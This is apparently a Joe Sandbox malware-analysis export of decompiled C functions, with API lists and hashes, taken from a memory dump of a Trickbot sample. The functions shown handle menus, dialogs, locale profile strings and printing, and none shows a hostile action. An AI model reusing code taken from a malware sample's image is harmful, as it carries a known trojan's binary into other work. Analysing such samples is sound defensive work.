                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                          • API String ID: 667068680-2376520503
                          • Opcode ID: 8dcd4ad56e0daeb56b6b550d04ad18270aec5e35b93c9b4e261a90fa81a6a2a7
                          • Instruction ID: 7c442283ef6f31aa7c708ca7144429c862d868b0a3aa335ca78265f57d9b110f
                          • Opcode Fuzzy Hash: 8dcd4ad56e0daeb56b6b550d04ad18270aec5e35b93c9b4e261a90fa81a6a2a7
                          • Instruction Fuzzy Hash: A9117FB9A412009ACB129F75ACC093BBAA4FB8E782724043FE118F37D0D7788455CB9D
                          Uniqueness
                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0042E896(intOrPtr* __ecx, struct HWND__* _a4, signed int _a8) {
                          				struct HWND__* _v0;
                          				intOrPtr _v4;
                          				signed int _v8;
                          				signed int _v12;
                          				intOrPtr _t59;
                          				int _t61;
                          				int _t65;
                          				struct HWND__* _t74;
                          				struct HWND__* _t79;
                          				struct HMENU__* _t81;
                          				struct HWND__* _t84;
                          				struct HWND__* _t88;
                          				signed int _t90;
                          				signed int _t91;
                          				struct HMENU__* _t103;
                          				intOrPtr* _t106;
                          				int _t108;
                          				intOrPtr* _t117;
                          				int* _t118;
                          				intOrPtr* _t119;
                          				struct HWND__* _t120;
                          
                          				_t119 = __ecx;
                          				_t59 =  *((intOrPtr*)( *__ecx + 0xc0))();
                          				_t103 = 0;
                          				_v4 = _t59;
                          				if(_a4 != 0) {
                          					_t117 =  *((intOrPtr*)(_t59 + 0x68));
                          					if(_t117 != 0) {
                          						 *((intOrPtr*)( *_t117 + 0x5c))(0);
                          					}
                          				}
                          				_t120 =  *(_t119 + 0x70);
                          				_t118 = _a8;
                          				_v12 = _t103;
                          				if(_t120 == _t103) {
                          					L13:
                          					_t118[2] = _v12;
                          					if(_a4 == _t103) {
                          						 *(_t119 + 0x9c) = _t103;
                          						_t61 = GetDlgItem( *(_t119 + 0x1c), 0xea21);
                          						__eflags = _t61;
                          						_a4 = _t61;
                          						if(_t61 != 0) {
                          							_t74 = GetDlgItem( *(_t119 + 0x1c), 0xe900);
                          							__eflags = _t74;
                          							if(_t74 != 0) {
                          								SetWindowLongA(_t74, 0xfffffff4, 0xea21);
                          							}
                          							SetWindowLongA(_a4, 0xfffffff4, 0xe900);
                          						}
                          						__eflags = _t118[1];
                          						if(_t118[1] != 0) {
                          							InvalidateRect( *(_t119 + 0x1c), 0, 1);
                          							SetMenu( *(_t119 + 0x1c), _t118[1]);
                          						}
                          						_t108 =  *(_v4 + 0x68);
                          						__eflags = _t108;
                          						if(_t108 != 0) {
                          							 *((intOrPtr*)( *_t108 + 0x5c))(1);
                          						}
                          						 *((intOrPtr*)( *_t119 + 0xc8))(1);
                          						_t65 =  *_t118;
                          						__eflags = _t65 - 0xe900;
                          						if(_t65 != 0xe900) {
                          							_v0 = GetDlgItem( *(_t119 + 0x1c), _t65);
                          						}
                          						ShowWindow(_v0, 5);
                          						 *(_t119 + 0x48) = _t118[5];
                          						return E0042D210(1);
                          					}
                          					 *(_t119 + 0x9c) = _t118[4];
                          					E0042D210(_t103);
                          					_t79 = GetDlgItem( *(_t119 + 0x1c),  *_t118);
                          					_v0 = _t79;
                          					ShowWindow(_t79, _t103);
                          					_t81 = GetMenu( *(_t119 + 0x1c));
                          					_t118[1] = _t81;
                          					if(_t81 != _t103) {
                          						InvalidateRect( *(_t119 + 0x1c), _t103, 1);
                          						SetMenu( *(_t119 + 0x1c), _t103);
                          						 *(_t119 + 0xb8) =  *(_t119 + 0xb8) & 0xfffffffe;
                          					}
                          					_t118[5] =  *(_t119 + 0x48);
                          					 *(_t119 + 0x48) = _t103;
                          					E0042CDE1(_t119, 0x7915);
                          					if( *_t118 == 0xe900) {
                          						_t84 = _a4;
                          					} else {
                          						_t84 = GetDlgItem( *(_t119 + 0x1c), 0xe900);
                          					}
                          					if(_t84 == 0) {
                          						return _t84;
                          					} else {
                          						return SetWindowLongA(_t84, 0xfffffff4, 0xea21);
                          					}
                          				} else {
                          					goto L4;
                          				}
                          				do {
                          					L4:
                          					_t88 = _t120;
                          					_t120 = _v0;
                          					_t106 =  *((intOrPtr*)(_t88 + 8));
                          					_t90 = GetDlgCtrlID( *(_t106 + 0x1c)) & 0x0000ffff;
                          					_v8 = _t90;
                          					if(_t90 >= 0xe800 && _t90 <= 0xe81f) {
                          						_t91 = 1;
                          						_a8 = _t91 << _t90 - 0xe800;
                          						if( *((intOrPtr*)( *_t106 + 0xc8))() != 0) {
                          							_v12 = _v12 | _a8;
                          						}
                          						if( *((intOrPtr*)( *_t106 + 0xd0))() == 0 || _v8 != 0xe81f) {
                          							E0042DF8C(_t118[2] & _a8, _t106, _t118[2] & _a8, 1);
                          						}
                          					}
                          				} while (_t120 != 0);
                          				_t103 = 0;
                          				goto L13;
                          			}

                          APIs
                          • GetDlgCtrlID.USER32(?), ref: 0042E8DA
                          • GetDlgItem.USER32(?,?), ref: 0042E977
                          • ShowWindow.USER32(00000000,00000000), ref: 0042E97F
                          • GetMenu.USER32(?), ref: 0042E988
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0042E99B
                          • SetMenu.USER32(?,00000000), ref: 0042E9A5
                          • GetDlgItem.USER32(?,0000E900), ref: 0042E9D4
                          • SetWindowLongA.USER32(?,000000F4,0000EA21), ref: 0042E9EC
                          • GetDlgItem.USER32(?,0000EA21), ref: 0042EA0B
                          • GetDlgItem.USER32(?,0000E900), ref: 0042EA1E
                          • SetWindowLongA.USER32(00000000,000000F4,0000EA21), ref: 0042EA2C
                          • SetWindowLongA.USER32(?,000000F4,0000E900), ref: 0042EA39
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0042EA4C
                          • SetMenu.USER32(?,00000000), ref: 0042EA58
                          • GetDlgItem.USER32(?,00000000), ref: 0042EA86
                          • ShowWindow.USER32(?,00000005), ref: 0042EA92
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: ItemWindow$LongMenu$InvalidateRectShow$Ctrl
                          • String ID:
                          • API String ID: 461998371-0
                          • Opcode ID: 9e359cb582f7a50c8e4168cbdb49eec8df1215a2bcda1f90f530299dfe666960
                          • Instruction ID: 117c9597cdad368f2e6a03035f7d9792f492811c3b1771dbd29823793948e872
                          • Opcode Fuzzy Hash: 9e359cb582f7a50c8e4168cbdb49eec8df1215a2bcda1f90f530299dfe666960
                          • Instruction Fuzzy Hash: 87616B70600311AFDB209F66EC88A2ABBE4FF08304F50492EF586972A1C775EC94CB59
                          Uniqueness
                          Uniqueness Score: -1.00%

                          C-Code - Quality: 94%
                          			E00415683(struct HWND__* _a4, intOrPtr _a8, short _a12, signed int _a16) {
                          				void* _t32;
                          				signed int _t34;
                          				void* _t40;
                          				int _t49;
                          				signed int _t58;
                          				intOrPtr _t63;
                          				void* _t64;
                          				intOrPtr* _t65;
                          
                          				if(_a4 == 0) {
                          					L19:
                          					return 0;
                          				}
                          				_t64 = E00432D4E(0x44b2ec, E00430506);
                          				_t54 =  *(_t64 + 0x18);
                          				if( *(_t64 + 0x18) != 0) {
                          					E0041B54C(_t54, _a4);
                          					 *(_t64 + 0x18) =  *(_t64 + 0x18) & 0x00000000;
                          				}
                          				_t63 = _a8;
                          				if(_t63 != 0x110) {
                          					__eflags = _t63 -  *0x44b714; // 0x0
                          					if(__eflags == 0) {
                          						L22:
                          						SendMessageA(_a4, 0x111, 0xe146, 0);
                          						_t32 = 1;
                          						return _t32;
                          					}
                          					__eflags = _t63 - 0x111;
                          					if(_t63 != 0x111) {
                          						L8:
                          						__eflags = _t63 - 0xc000;
                          						if(_t63 < 0xc000) {
                          							goto L19;
                          						}
                          						_push(_a4);
                          						_t65 = E00418874();
                          						_t34 = E0041C5C7(_t65, 0x43da50);
                          						__eflags = _t34;
                          						if(_t34 == 0) {
                          							L11:
                          							__eflags = _t63 -  *0x44b720; // 0x0
                          							if(__eflags != 0) {
                          								__eflags = _t63 -  *0x44b71c; // 0x0
                          								if(__eflags != 0) {
                          									__eflags = _t63 -  *0x44b724; // 0x0
                          									if(__eflags != 0) {
                          										__eflags = _t63 -  *0x44b718; // 0x0
                          										if(__eflags != 0) {
                          											goto L19;
                          										}
                          										return  *((intOrPtr*)( *_t65 + 0xd0))();
                          									}
                          									_t58 = _a16 >> 0x10;
                          									__eflags = _t58;
                          									 *((intOrPtr*)( *_t65 + 0xd8))(_a12, _a16 & 0x0000ffff, _t58);
                          									goto L19;
                          								}
                          								__eflags =  *0x44b354;
                          								if( *0x44b354 != 0) {
                          									 *(_t65 + 0x1f4) = _a16;
                          								}
                          								_t40 =  *((intOrPtr*)( *_t65 + 0xd4))();
                          								 *(_t65 + 0x1f4) =  *(_t65 + 0x1f4) & 0x00000000;
                          								return _t40;
                          							}
                          							return  *((intOrPtr*)( *_t65 + 0xd0))(_a16);
                          						}
                          						__eflags =  *(_t65 + 0x92) & 0x00000008;
                          						if(( *(_t65 + 0x92) & 0x00000008) != 0) {
                          							goto L19;
                          						}
                          						goto L11;
                          					}
                          					__eflags = _a12 - 0x40e;
                          					if(_a12 == 0x40e) {
                          						goto L22;
                          					}
                          					goto L8;
                          				} else {
                          					 *0x44b724 = RegisterWindowMessageA("commdlg_LBSelChangedNotify");
                          					 *0x44b720 = RegisterWindowMessageA("commdlg_ShareViolation");
                          					 *0x44b71c = RegisterWindowMessageA("commdlg_FileNameOK");
                          					 *0x44b718 = RegisterWindowMessageA("commdlg_ColorOK");
                          					 *0x44b714 = RegisterWindowMessageA("commdlg_help");
                          					_t49 = RegisterWindowMessageA("commdlg_SetRGBColor");
                          					_push(_a16);
                          					 *0x44b710 = _t49;
                          					_push(_a12);
                          					return E004172A4(_t54, _a4, 0x110);
                          				}
                          			}

                          APIs
                            • Part of subcall function 00432D4E: TlsGetValue.KERNEL32(0044B4A0,?,00000000,00432571,00430506,0043258D,0041C011,0041E91C,?,00000000,?,00413D3C,00000000,00000000,00000000,00000000), ref: 00432D8D
                          • RegisterWindowMessageA.USER32(commdlg_LBSelChangedNotify,Function_00030506), ref: 004156CE
                          • RegisterWindowMessageA.USER32(commdlg_ShareViolation), ref: 004156DA
                          • RegisterWindowMessageA.USER32(commdlg_FileNameOK), ref: 004156E6
                          • RegisterWindowMessageA.USER32(commdlg_ColorOK), ref: 004156F2
                          • RegisterWindowMessageA.USER32(commdlg_help), ref: 004156FE
                          • RegisterWindowMessageA.USER32(commdlg_SetRGBColor), ref: 0041570A
                            • Part of subcall function 0041B54C: SetWindowLongA.USER32(?,000000FC,00000000), ref: 0041B57B
                          • SendMessageA.USER32(00000000,00000111,0000E146,00000000), ref: 004157FD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: MessageWindow$Register$LongSendValue
                          • String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
                          • API String ID: 2377901579-3888057576
                          • Opcode ID: 900684bfb75333cc45177bf3ada257e388348abc2edac0a0e26787e2edd12029
                          • Instruction ID: a41f3be4db2eae72add49b151d6a0429f1812480a00410e0222ba3c4155d7401
                          • Opcode Fuzzy Hash: 900684bfb75333cc45177bf3ada257e388348abc2edac0a0e26787e2edd12029
                          • Instruction Fuzzy Hash: 60419135A00604EBDB25AF29DC49BFE3BA1EB84355F10042BF416573A0D7789890CBED
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004115F0() {
                          				char _v12;
                          				void* _t5;
                          				int _t12;
                          
                          				if( *0x44de45 != 0) {
                          					EnterCriticalSection(0x44d320);
                          					 *0x44de44 = 0x1e;
                          					GetProfileStringA("windows", "kanjimenu", "roman",  &_v12, 9);
                          					if(lstrcmpiA( &_v12, "kanji") == 0) {
                          						 *0x44de44 = 0x1f;
                          					}
                          					GetProfileStringA("windows", "hangeulmenu", "english",  &_v12, 9);
                          					_t12 = lstrcmpiA( &_v12, "hangeul");
                          					if(_t12 == 0) {
                          						 *0x44de44 = 0x1f;
                          					}
                          					LeaveCriticalSection(0x44d320);
                          					return _t12;
                          				}
                          				return _t5;
                          			}

                          APIs
                          • EnterCriticalSection.KERNEL32(0044D320,75B8679F,75798AEE,?,?,?,?,?,?,?,?,?,?,?,?,00410C07), ref: 00411607
                          • GetProfileStringA.KERNEL32(windows,kanjimenu,roman,?,00000009), ref: 00411630
                          • lstrcmpiA.KERNEL32(?,kanji,?,?,?,?,?,?,?,?,?,?,?,?,00410C07), ref: 00411642
                          • GetProfileStringA.KERNEL32(windows,hangeulmenu,english,?,00000009), ref: 00411665
                          • lstrcmpiA.KERNEL32(?,hangeul,?,?,?,?,?,?,?,?,?,?,?,?,00410C07), ref: 00411671
                          • LeaveCriticalSection.KERNEL32(0044D320,?,?,?,?,?,?,?,?,?,?,?,?,00410C07), ref: 00411683
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CriticalProfileSectionStringlstrcmpi$EnterLeave
                          • String ID: english$hangeul$hangeulmenu$kanji$kanjimenu$roman$windows
                          • API String ID: 1105401458-111014456
                          • Opcode ID: cffe92d71e3b01aec802f2bf15d07d601ad0e84d47b7de81477d3db18a110bbf
                          • Instruction ID: 5870e9367237d0ea5be8e25e71417414cc5b7966b73449400b4c290467772ac3
                          • Opcode Fuzzy Hash: cffe92d71e3b01aec802f2bf15d07d601ad0e84d47b7de81477d3db18a110bbf
                          • Instruction Fuzzy Hash: 9A01F735B803067BF6109758EC0AFC73F885B95B44F2409A6F904A20A5E2EC5C08966E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 92%
                          			E0043547D(intOrPtr* __ecx, void* __eflags) {
                          				void* __ebx;
                          				signed int _t227;
                          				void* _t228;
                          				CHAR* _t229;
                          				intOrPtr _t231;
                          				CHAR* _t232;
                          				signed int _t233;
                          				CHAR* _t242;
                          				CHAR* _t243;
                          				CHAR* _t253;
                          				intOrPtr* _t256;
                          				intOrPtr _t265;
                          				signed char _t266;
                          				intOrPtr _t268;
                          				int _t290;
                          				int _t296;
                          				signed int _t300;
                          				int _t310;
                          				void* _t323;
                          				void* _t335;
                          				void* _t337;
                          				intOrPtr _t353;
                          				struct HDC__* _t355;
                          				intOrPtr _t357;
                          				signed char _t383;
                          				void* _t396;
                          				signed int _t449;
                          				intOrPtr* _t452;
                          				intOrPtr* _t455;
                          				struct _DOCINFOA _t458;
                          				void* _t460;
                          				signed char _t461;
                          				void* _t463;
                          				void* _t465;
                          				void* _t466;
                          				void* _t468;
                          
                          				E00405340(E00437CF0, _t463);
                          				_t466 = _t465 - 0x32c;
                          				_t452 = __ecx;
                          				 *((intOrPtr*)(_t463 - 0x24)) = __ecx;
                          				E00435B9E(_t463 - 0x80);
                          				 *(_t463 - 4) = 0;
                          				if( *((short*)(E0041877F() + 8)) != 0xe108) {
                          					L6:
                          					_t227 =  *((intOrPtr*)( *_t452 + 0xf4))(_t463 - 0x80);
                          					__eflags = _t227;
                          					if(_t227 != 0) {
                          						_t229 =  *0x447478; // 0x44748c
                          						 *(_t463 - 0x3c) = _t229;
                          						 *(_t463 - 4) = 1;
                          						_t231 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
                          						__eflags =  *(_t231 + 0x14) & 0x00000020;
                          						if(( *(_t231 + 0x14) & 0x00000020) == 0) {
                          							L12:
                          							_t232 =  *0x447478; // 0x44748c
                          							 *(_t463 - 0x14) = _t232;
                          							_t233 =  *(_t452 + 0x3c);
                          							 *(_t463 - 4) = 0xa;
                          							__eflags = _t233;
                          							if(_t233 == 0) {
                          								E004191FC(E00419D7A(_t452), _t463 - 0x14);
                          							} else {
                          								E00417FB5(_t463 - 0x14, _t463, _t233 + 0x1c);
                          							}
                          							__eflags =  *((intOrPtr*)( *(_t463 - 0x14) - 8)) - 0x1f;
                          							if(__eflags > 0) {
                          								E00418246(_t463 - 0x14, __eflags, 0x1f);
                          							}
                          							_t458 = 0x14;
                          							E00405360(_t463 - 0x94, 0, _t458);
                          							_t468 = _t466 + 0xc;
                          							 *(_t463 - 0x90) =  *(_t463 - 0x14);
                          							_t242 =  *0x447478; // 0x44748c
                          							 *(_t463 - 0x94) = _t458;
                          							 *(_t463 - 0x38) = _t242;
                          							_t243 =  *(_t463 - 0x3c);
                          							 *(_t463 - 4) = 0xb;
                          							__eflags =  *(_t243 - 8);
                          							if( *(_t243 - 8) != 0) {
                          								 *(_t463 - 0x8c) = _t243;
                          								E0041D9E9(_t243, E004181F7(_t463 - 0x38, _t463, 0x104), 0x104);
                          								_t460 = 0xf049;
                          							} else {
                          								 *(_t463 - 0x8c) = 0;
                          								_t323 = E00415A69( *((intOrPtr*)(_t463 - 0x80)), _t463 - 0x18);
                          								 *(_t463 - 4) = 0xc;
                          								E00417FB5(_t463 - 0x38, _t463, _t323);
                          								 *(_t463 - 4) = 0xb;
                          								E00417EC8(_t463 - 0x18);
                          								_t460 = 0xf040;
                          							}
                          							E00420CA4(_t463 - 0x34);
                          							__eflags =  *(_t463 - 0x7c);
                          							 *(_t463 - 4) = 0xd;
                          							if( *(_t463 - 0x7c) == 0) {
                          								E00420D5B(_t463 - 0x34,  *( *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c)) + 0x10));
                          								 *(_t463 - 0x28) = 1;
                          							}
                          							 *((intOrPtr*)( *_t452 + 0xf8))(_t463 - 0x34, _t463 - 0x80);
                          							__eflags =  *(_t463 - 0x7c);
                          							if( *(_t463 - 0x7c) == 0) {
                          								SetAbortProc( *(_t463 - 0x30), E004352F9);
                          							}
                          							E0041B815(E004041A9(), 0);
                          							_push(_t452);
                          							E00435AEC(_t463 - 0xf0, __eflags);
                          							_t253 =  *0x447478; // 0x44748c
                          							 *(_t463 - 0x20) = _t253;
                          							 *(_t463 - 4) = 0xf;
                          							E0041B60D(_t463 - 0xf0, 0xc9,  *(_t463 - 0x14));
                          							_t256 = E00415A2B( *((intOrPtr*)(_t463 - 0x80)), _t463 - 0x18);
                          							 *(_t463 - 4) = 0x10;
                          							E0041B60D(_t463 - 0xf0, 0xca,  *_t256);
                          							 *(_t463 - 4) = 0xf;
                          							E00417EC8(_t463 - 0x18);
                          							E00428A52(_t463 - 0x20, _t460,  *(_t463 - 0x38));
                          							E0041B60D(_t463 - 0xf0, 0xcb,  *(_t463 - 0x20));
                          							E0041B7D3(_t463 - 0xf0, 5);
                          							UpdateWindow( *(_t463 - 0xd4));
                          							__eflags =  *(_t463 - 0x7c);
                          							if( *(_t463 - 0x7c) != 0) {
                          								L27:
                          								_t265 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
                          								_t449 =  *(_t265 + 0x1a) & 0x0000ffff;
                          								_t383 =  *(_t265 + 0x1c) & 0x0000ffff;
                          								_t461 =  *(_t265 + 0x18) & 0x0000ffff;
                          								__eflags = _t449 - _t383;
                          								 *(_t463 - 0x10) = _t449;
                          								if(_t449 < _t383) {
                          									 *(_t463 - 0x10) = _t383;
                          								}
                          								_t266 =  *(_t265 + 0x1e) & 0x0000ffff;
                          								__eflags =  *(_t463 - 0x10) - _t266;
                          								if( *(_t463 - 0x10) > _t266) {
                          									 *(_t463 - 0x10) = _t266;
                          								}
                          								__eflags = _t461 - _t383;
                          								if(_t461 < _t383) {
                          									_t461 = _t383;
                          								}
                          								__eflags = _t461 - _t266;
                          								if(_t461 > _t266) {
                          									_t461 = _t266;
                          								}
                          								__eflags =  *(_t463 - 0x10) - _t461;
                          								asm("sbb eax, eax");
                          								_t268 = (_t266 & 0x000000fe) + 1;
                          								__eflags =  *(_t463 - 0x10) - 0xffff;
                          								 *((intOrPtr*)(_t463 - 0x18)) = _t268;
                          								if(__eflags != 0) {
                          									_t151 = _t463 - 0x10;
                          									 *_t151 =  *(_t463 - 0x10) + _t268;
                          									__eflags =  *_t151;
                          								} else {
                          									 *(_t463 - 0x10) = 0xffff;
                          								}
                          								E0041C67E(_t463 - 0x20, __eflags, 0xf043);
                          								__eflags =  *(_t463 - 0x7c);
                          								 *(_t463 - 0x1c) = 0;
                          								if( *(_t463 - 0x7c) == 0) {
                          									__eflags = _t461 -  *(_t463 - 0x10);
                          									 *(_t463 - 0x6c) = _t461;
                          									if(_t461 ==  *(_t463 - 0x10)) {
                          										goto L53;
                          									} else {
                          										while(1) {
                          											 *((intOrPtr*)( *_t452 + 0xdc))(_t463 - 0x34, _t463 - 0x80);
                          											__eflags =  *(_t463 - 0x70);
                          											if( *(_t463 - 0x70) == 0) {
                          												goto L51;
                          											}
                          											wsprintfA(_t463 - 0x140,  *(_t463 - 0x20),  *(_t463 - 0x6c));
                          											_t468 = _t468 + 0xc;
                          											E0041B60D(_t463 - 0xf0, 0xcc, _t463 - 0x140);
                          											_t290 = GetDeviceCaps( *(_t463 - 0x2c), 0xa);
                          											SetRect(_t463 - 0x5c, 0, 0, GetDeviceCaps( *(_t463 - 0x2c), 8), _t290);
                          											DPtoLP( *(_t463 - 0x2c), _t463 - 0x5c, 2);
                          											_t296 = StartPage( *(_t463 - 0x30));
                          											__eflags = _t296;
                          											if(_t296 < 0) {
                          												L50:
                          												_t452 =  *((intOrPtr*)(_t463 - 0x24));
                          												 *(_t463 - 0x1c) = 1;
                          											} else {
                          												__eflags =  *0x44b360; // 0x1
                          												_t455 =  *((intOrPtr*)(_t463 - 0x24));
                          												if(__eflags != 0) {
                          													 *((intOrPtr*)( *_t455 + 0xdc))(_t463 - 0x34, _t463 - 0x80);
                          												}
                          												 *((intOrPtr*)( *_t455 + 0xfc))(_t463 - 0x34, _t463 - 0x80);
                          												__eflags = EndPage( *(_t463 - 0x30));
                          												if(__eflags < 0) {
                          													goto L50;
                          												} else {
                          													_t300 = E004352F9(__eflags,  *(_t463 - 0x30), 0);
                          													__eflags = _t300;
                          													if(_t300 == 0) {
                          														goto L50;
                          													} else {
                          														_t452 =  *((intOrPtr*)(_t463 - 0x24));
                          														 *(_t463 - 0x6c) =  *(_t463 - 0x6c) +  *((intOrPtr*)(_t463 - 0x18));
                          														__eflags =  *(_t463 - 0x6c) -  *(_t463 - 0x10);
                          														if( *(_t463 - 0x6c) !=  *(_t463 - 0x10)) {
                          															continue;
                          														} else {
                          														}
                          													}
                          												}
                          											}
                          											goto L51;
                          										}
                          										goto L51;
                          									}
                          								} else {
                          									 *((intOrPtr*)( *_t452 + 0xdc))(_t463 - 0x34, _t463 - 0x80);
                          									 *((intOrPtr*)( *_t452 + 0xfc))(_t463 - 0x34, _t463 - 0x80);
                          									L51:
                          									__eflags =  *(_t463 - 0x7c);
                          									if( *(_t463 - 0x7c) == 0) {
                          										__eflags =  *(_t463 - 0x1c);
                          										if( *(_t463 - 0x1c) != 0) {
                          											AbortDoc( *(_t463 - 0x30));
                          										} else {
                          											L53:
                          											EndDoc( *(_t463 - 0x30));
                          										}
                          									}
                          								}
                          								E0041B815(E004041A9(), 1);
                          								 *((intOrPtr*)( *_t452 + 0x100))(_t463 - 0x34, _t463 - 0x80);
                          								E0041907D(_t463 - 0xf0);
                          								E00420D92(_t463 - 0x34);
                          							} else {
                          								_t310 = StartDocA( *(_t463 - 0x30), _t463 - 0x94);
                          								__eflags = _t310 - 0xffffffff;
                          								if(_t310 != 0xffffffff) {
                          									goto L27;
                          								} else {
                          									E0041B815(E004041A9(), 1);
                          									 *((intOrPtr*)( *_t452 + 0x100))(_t463 - 0x34, _t463 - 0x80);
                          									E0041907D(_t463 - 0xf0);
                          									E00420D92(_t463 - 0x34);
                          									_push(0xffffffff);
                          									_push(0);
                          									_push(0xf106);
                          									E00428683(_t463 - 0x34, __eflags);
                          								}
                          							}
                          							 *(_t463 - 4) = 0xe;
                          							E00417EC8(_t463 - 0x20);
                          							 *(_t463 - 4) = 0xd;
                          							 *((intOrPtr*)(_t463 - 0xf0)) = 0x43b58c;
                          							E00417440(_t463 - 0xf0);
                          							 *(_t463 - 4) = 0xb;
                          							E00420DC3(_t463 - 0x34);
                          							 *(_t463 - 4) = 0xa;
                          							E00417EC8(_t463 - 0x38);
                          							 *(_t463 - 4) = 1;
                          							_t396 = _t463 - 0x14;
                          						} else {
                          							__eflags =  *(_t463 - 0x7c);
                          							if( *(_t463 - 0x7c) != 0) {
                          								goto L12;
                          							} else {
                          								E00417F36(_t463 - 0x1c, _t463, 0xf045);
                          								 *(_t463 - 4) = 2;
                          								E00417F36(_t463 - 0x40, _t463, 0xf046);
                          								 *(_t463 - 4) = 3;
                          								E00417F36(_t463 - 0x44, _t463, 0xf047);
                          								 *(_t463 - 4) = 4;
                          								E00417F36(_t463 - 0x10, _t463, 0xf048);
                          								_push(0);
                          								_push( *((intOrPtr*)(_t463 - 0x44)));
                          								 *(_t463 - 4) = 5;
                          								_push(6);
                          								_push( *((intOrPtr*)(_t463 - 0x40)));
                          								_push( *(_t463 - 0x1c));
                          								_push(0);
                          								E00415B1E(_t463 - 0x338);
                          								 *(_t463 - 4) = 6;
                          								 *(_t463 - 0x2ac) =  *(_t463 - 0x10);
                          								_t335 = E00415C80(0);
                          								__eflags = _t335 - 1;
                          								if(_t335 == 1) {
                          									_push(_t463 - 0x18);
                          									_t337 = E00415D5B(_t463 - 0x338);
                          									 *(_t463 - 4) = 8;
                          									E00417FB5(_t463 - 0x3c, _t463, _t337);
                          									 *(_t463 - 4) = 6;
                          									E00417EC8(_t463 - 0x18);
                          									 *(_t463 - 4) = 9;
                          									E00417EC8(_t463 - 0x28c);
                          									 *(_t463 - 4) = 5;
                          									E00417440(_t463 - 0x338);
                          									 *(_t463 - 4) = 4;
                          									E00417EC8(_t463 - 0x10);
                          									 *(_t463 - 4) = 3;
                          									E00417EC8(_t463 - 0x44);
                          									 *(_t463 - 4) = 2;
                          									E00417EC8(_t463 - 0x40);
                          									 *(_t463 - 4) = 1;
                          									E00417EC8(_t463 - 0x1c);
                          									goto L12;
                          								} else {
                          									 *(_t463 - 4) = 7;
                          									E00417EC8(_t463 - 0x28c);
                          									 *(_t463 - 4) = 5;
                          									E00417440(_t463 - 0x338);
                          									 *(_t463 - 4) = 4;
                          									E00417EC8(_t463 - 0x10);
                          									 *(_t463 - 4) = 3;
                          									E00417EC8(_t463 - 0x44);
                          									 *(_t463 - 4) = 2;
                          									E00417EC8(_t463 - 0x40);
                          									 *(_t463 - 4) = 1;
                          									_t396 = _t463 - 0x1c;
                          								}
                          							}
                          						}
                          						E00417EC8(_t396);
                          						 *(_t463 - 4) = 0;
                          						E00417EC8(_t463 - 0x3c);
                          					}
                          				} else {
                          					_t353 =  *((intOrPtr*)( *((intOrPtr*)(E00432562() + 4)) + 0xac));
                          					if(_t353 == 0 ||  *((intOrPtr*)(_t353 + 0x10)) != 3) {
                          						L5:
                          						 *(_t463 - 0x74) = 1;
                          						goto L6;
                          					} else {
                          						_t355 = CreateDCA( *(_t353 + 0x1c),  *(_t353 + 0x18),  *(_t353 + 0x20), 0);
                          						_t448 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
                          						 *( *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c)) + 0x10) = _t355;
                          						_t357 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
                          						_t473 =  *((intOrPtr*)(_t357 + 0x10));
                          						if( *((intOrPtr*)(_t357 + 0x10)) != 0) {
                          							goto L5;
                          						} else {
                          							_push(0xffffffff);
                          							_push(0);
                          							_push(0xf106);
                          							E00428683(_t448, _t473);
                          						}
                          					}
                          				}
                          				 *(_t463 - 4) =  *(_t463 - 4) | 0xffffffff;
                          				_t228 = E00435C26(_t463 - 0x80);
                          				 *[fs:0x0] =  *((intOrPtr*)(_t463 - 0xc));
                          				return _t228;
                          			}
                          0x0043555b
                          0x00435568
                          0x0043556c
                          0x00435579
                          0x0043557d
                          0x00435582
